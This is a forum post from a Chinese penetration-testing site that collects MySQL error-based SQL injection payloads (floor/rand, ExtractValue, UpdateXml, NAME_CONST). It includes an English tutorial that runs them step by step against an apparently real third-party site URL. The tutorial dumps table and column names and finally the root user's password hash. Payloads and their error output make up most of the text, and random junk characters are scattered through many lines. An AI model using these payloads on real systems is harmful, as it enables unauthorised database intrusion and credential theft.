中国网络渗透测试联盟

标题: mysql ,floor,ExtractValue,UpdateXml三种报错模式注入利用方法 [打印本页]
作者: admin    时间: 2015-11-11 19:03
标题: mysql ,floor,ExtractValue,UpdateXml三种报错模式注入利用方法

1、通过floor报错

可以通过如下一些利用代码

and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);

and (select count(*) from (select 1 union   select null union   select  !1)x group by concat((select table_name from information_schema.tables  limit 1),floor(rand(0)*2)));

举例如下:% a" o+ R# r$ |5 M! x5 W# y
首先进行正常查询:

mysql> select * from article where id = 1;
9 x; w, [0 y5 z! I+—-+——-+———+
' Z% B" d' |3 ~; d$ ]# `| id | title | content |
! G" M7 n! j* g6 B4 [: X, c% g+—-+——-+———+; X: V2 R/ u1 Q0 X' H) b2 H9 N6 Z
|  1 | test  | do it   |' A) \) C  S3 X3 R  U( T4 `
+—-+——-+———+

假如id输入存在注入的话,可以通过如下语句进行报错。

mysql> select * from article where id = 1 and (select 1 from  (select count(*),concat(version(),floor(rand(0)*2))x from  information_schema.tables group by x)a);8 R1 d! V6 b' y+ S
ERROR 1062 (23000): Duplicate entry ’5.1.33-community-log1′ for key ’group_key’

可以看到成功爆出了Mysql的版本,如果需要查询其他数据,可以通过修改version()所在位置语句进行查询。$ ^$ S1 [% s8 \+ i
例如我们需要查询管理员用户名和密码:

Method1:

mysql> select * from article where id = 1 and (select 1 from  (select count(*),concat((select pass from admin where id  =1),floor(rand(0)*2))x from information_schema.tables group by x)a);2 }6 D3 x. z! }0 _& Y( R  g+ g
ERROR 1062 (23000): Duplicate entry ’admin8881′ for key ’group_key’

Method2:

mysql> select * from article where id = 1 and (select count(*)  from (select 1 union   select null union   select !1)x group by  concat((select pass from admin limit 1),floor(rand(0)*2)));
6 a* l/ W- l2 T$ W& }ERROR 1062 (23000): Duplicate entry ’admin8881′ for key ’group_key’

2、ExtractValue
) r1 B0 A( W, `4 G! d测试语句如下

and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));

实际测试过程

mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));–  V* y  c: N9 V9 O  l1 p
ERROR 1105 (HY000): XPATH syntax error: ’\admin888′

3、UpdateXml

测试语句

and 1=(updatexml(1,concat(0x3a,(select user())),1))

实际测试过程

mysql> select * from article where id = 1 and 1=(updatexml(0x3a,concat(1,(select user())),1))ERROR 1105 (HY000): XPATH syntax error: ’:root@localhost’

, G2 z2 O7 R( |4 S6 Q& R  W9 p
/ |8 p5 p% u2 A4 G" r

再收集:

+ o8 X# A+ N$ Q& w# ?$ W7 q6 Z
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c)
- u, ]9 T; f% C( K! G0 r. t- T+ B& O7 F6 V/ U. T0 W/ X1 f4 q
Erroruplicate column name ‘5.0.27-community-nt’Erroruplicate column name ‘5.0.27-community-nt’
1 H/ A3 R" ~% F9 m7 V# f! M+ X5 D$ |  m- }4 @0 V; D9 I! f
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const((select concat(user,password) from mysql.user limit 0,1),0))a join (select name_const((select concat(user,password) from mysql.user limit 0,1),0))b)c)% |, A7 T, I7 x* C1 v  l

- |' t- y, y1 L1 f7 V  W0 O6 U: X" oErroruplicate column name ‘root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82′Erroruplicate column name ‘root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82′ ' O  O4 K$ Q- O

% B! \% c8 _8 H' ~  N9 ~MYSQL高版本报错注入技巧-利用NAME_CONST注入
; j8 R6 g$ q: F. f1 }' B* j% T3 HIt's been a while since I've made an SQL Injection tutorial, so I'd thought I should make a new tutorial using the method name_const. There's not many papers documenting this method, so it feels kind of good to be the one to make a guide for it.
! V  K- }( Z) Z: [6 ~4 L6 _3 e. j; L, B/ S, I
' A% |" G" g; G  X$ _
相关信息# O' |8 E( _  M! ?  r
  P+ u! ?2 N2 j3 r# D
NAME_CONST was added in MySQL 5.0.12, so it won't work on anything less than that.
/ ?: m( K* i5 K, m# q9 w/ M* o& _1 @8 K- J) ?- a3 r
Code:* R8 e  n1 n. G3 W
NAME_CONST(DATA, VALUE)
* f' N7 C# i) x
- R; H$ f2 D3 d+ L: R* p( kReturns the given value. When used to produce a result set column, NAME_CONST() causes the column to have the given name. The arguments should be constants.
- A0 i/ n. {5 |- k3 r
' y$ {# k1 H, C! }2 r7 X/ LSELECT NAME_CONST('TEST', 1)7 g4 L: O) ]) X# |3 E9 _6 C
+ |& [  n5 l. X- L

, s2 H! F$ x. |3 T: z# {5 E; }( q( p6 A6 Y4 \' t  E! u' a" n1 E
|---------------|
2 ~& O; l# L. i  T|     TEST      |* {' a/ a2 R5 p/ K' s9 Q
|               |9 Q7 o$ h# n1 W, F: W
|---------------|% B- _% J; d( {: ~
|       1       |
' w3 |* m. l* d1 O|               |: y- y; d1 e% m% q8 _4 [$ m) ?
|---------------|
2 E) ~- {6 Y( |0 M4 _% t' H: q, C8 ]
+ A$ L( D5 q  {. K' L6 I3 m
6 S* q) C2 G5 x4 h7 T' Y
' ?2 v! j. Q4 d9 ^: s
http://dev.mysql.com/doc/refman/5.0/en/m...name-const
7 g! H% U8 h1 h! K$ AIntro to MySQL Variables
$ x! b% N& Q: G4 B: w9 G8 h* u, ?+ W6 u/ d7 z, l# f5 d
Once you've got your vulnerable site, lets try getting some MySQL system variables using NAME_CONST.2 S2 P" x& _0 F) o* M% C

2 Z  ?* O$ r5 Y9 E% s) t* c6 uCode:
% T* P/ W: J6 [1 p) ?/ X2 b. p5 Ehttp://www.baido.hk/qcwh/content ... ;sid=19&cid=2617 I- N6 a4 [1 }% a( K# N
9 D* j+ [# o3 [% Z/ U" p- H

, W5 ^: J# t* M. T! E! U9 E7 l2 H7 S0 r% d

, G+ X) {! o7 n( _% e. \: ]7 a, p0 m, \' n" s
Code:
; T7 k5 I8 v0 Band+1=(select+*+from+(select+NAME_CONST(VAR,1),NAME_CONST(VAR,1))+as+x)--
/ _7 p7 J+ J# |0 Q+ M8 [! Z( K- a- f" ]

( ?  a4 p& @! I, B; }0 @4 a6 n. NVAR = Your MySQL variable.
! W5 S/ S" H9 `5 h9 s! `3 e( _5 L# X, L: `' B: B5 m. J; @
MySQL 5.1.3 Server System Variables% ?" d1 W6 q  ~% d/ Q

" b2 A- }) v' F6 F9 M9 o$ FLet's try it out on my site..2 }, W3 m* Y" A, x+ X6 B; B

2 I# D, ~; A$ [Code:
" O$ G+ }$ l' h3 phttp://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)--" }% f  J; u% J8 ?! P
. e/ M# t: P; l" w
Erroruplicate column name '5.0.27-community-nt'
: R0 Z+ i1 [8 m. d9 F- `& ?# |, O/ J  d) G. D" Y

, O. l( a$ t% _1 N) T+ Z+ @4 u$ r/ E5 f( M
, d! l9 [; b4 `8 g7 Y5 m; f
1 t6 e8 h( _. b/ q+ J+ r
Now I've tried a couple of sites, and I was getting invalid calls to NAME_CONST trying to extract data. Nothing was wrong with my syntax, just wouldn't work there. Luckily, they work here so let's get this going again...
! A* C' o9 f2 q1 F7 @, X' V% m0 s3 q* G: C
Data Extraction
# ^5 v4 I) m0 R7 x# a% m- r' ?6 w$ R8 G, A
Code:4 D  W9 f- V$ U& z4 k+ ^6 {
+and+1=(select+*+from+(select+NAME_CONST((select+DATA+limit+0,1),1),NAME_CONST((select+DATA+limit+0,1),1))+as+x)--; k6 A& d2 l! ?1 x6 @* j. U4 h
; [9 e8 S$ }3 G; t/ m4 Q
& f5 n* A4 C" V
We should get a duplicate column 1 error...9 C" p" \) e+ ^; u6 y+ ?

3 h$ c; _+ ~7 p5 }  v, p% R8 a# ^Code:
; Y) F) W2 }+ ]/ ^4 S8 U% ~http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+1+limit+0,1),1),NAME_CONST((select+1+limit+0,1),1))+as+x)--: v9 ^1 t" t% }

6 N3 [: o! O. z' D7 TErroruplicate column name '15 Z2 {2 j% c) D( x2 A& o, @
( V* S; o- ]8 Y+ N
6 w& ?6 v+ o1 u* X
$ y. @2 n* z9 w! b3 B! ^$ z
$ ]6 a. l. @( Z+ }6 h# f- g$ x
% D( l, c" a+ c9 I

2 `6 u& C1 H( dNow let's get the tables out this bitch..
# [! c  S. m7 F3 I  _% T" `$ D# C9 u3 D4 u2 e5 S3 D' T  [- \% C3 m
Code:
2 `. G0 C; V* \  \% i0 [7 L7 H+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--
8 E+ E5 t6 j0 a7 ]1 r4 ~
3 s+ E1 W# _4 e- q: s. ~! k: f* |. |& m0 E! |* J
Let's see if it works here, if it does, we can go on and finish the job.0 N) Y! [$ s; q2 [0 {$ k

2 R  V  p4 G* F* eCode:
7 A% I+ [6 I& M, G7 nhttp://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--
( R% x% T8 {- A% f7 H
( r; ]$ u7 _( e8 [: A, D/ o
8 G; s) u$ L# m+ o, w# R2 cErroruplicate column name 'com_admanage
) z: ?0 {- l) ?' d0 j2 A' d+ d
5 D2 D& a/ R4 m' W1 l& B
. U8 r1 r5 B7 z: m
' |3 W. `1 ]8 \# D$ e
2 {0 W; U4 \( R, a3 t3 G9 y/ o! J4 R( ~
, F9 s4 c9 t- z) [
Now I'm going to be lazy and use mysql.user as an example, just for the sake of time.( s& @/ x$ Y" U: ^. X$ \1 _
2 {: ?5 [6 ~. C; N3 `, l1 ?
Let's get the columns out of the user table..
7 m( ~- q$ b9 D0 W5 y# G  I+ _# {: e1 ^1 L1 M7 D
Code:5 Q+ S  `- t/ g- f& n, i
+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1))+as+x)--
- b- ]/ j  p& I8 O, M4 X* T, V8 b+ O( U9 Q  K$ t0 a

5 y. F3 n' `9 P& b" d/ ySo mine looks like this, and I get the duplicate column name 'Host'.3 j* R2 H7 z5 I1 @2 z2 i0 t# T8 C' E
; i7 I; H+ m  @6 J7 ?
Code:
5 w; g7 X1 {6 G+ f% K# Ghttp://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1))+as+x)--: p" O, g* x& _; K3 J7 Z5 ^

! I4 |; e* K# {) h& ~9 h: I! n5 `Erroruplicate column name 'Host'! J; a4 i) o2 m
$ G5 d! m5 k5 w( ^( P

+ |9 @) l* y+ K
+ {( @1 p! t$ J; w8 i4 _( w, ~- a* R. v5 {% }  l! S+ Y! b

6 W" d* W- h, V' t4 E1 \8 I
  a' {' E2 K, t- k! YWoot, time to finish this bitch off.' i) O0 a& X* V7 {! T: I( n
) ^; T; m* s- [. |
Code:
8 ?( y, G% ^0 g9 I( T. m3 R+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1))+as+x)--+ i/ G* A. i, C- d  t) S

- i% K, L. u% U1 j2 j) c6 ?4 O' t: l# e- G) E* r4 {7 c
So mine looks like this...
$ V9 N# z5 {5 G$ w$ F! U: L" A8 m
* G" C$ E. X4 xCode:
, g+ ]# R* e/ rhttp://www.baido.hk /qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1))+as+x)--
8 N, W8 Q$ R8 ^, Z1 n4 A6 b( Q4 _/ u
Erroruplicate column name 'root ~ *B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'3 L4 o7 b' g1 b, y- e3 \. \9 w* V
9 O4 w+ ^6 M+ d* r! U

$ {, W" r, _6 C 7 y/ W1 o1 z1 ^0 B* Z9 `+ x

+ C6 b0 w) |) X, y& s
, y& Z% I7 {! H/ e) ?9 ^1 M8 _- [: [4 `: q( B; {) Z
And there we have it, thanks for reading.4 t) L8 B' R# x

) B, L  e+ z! Y



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2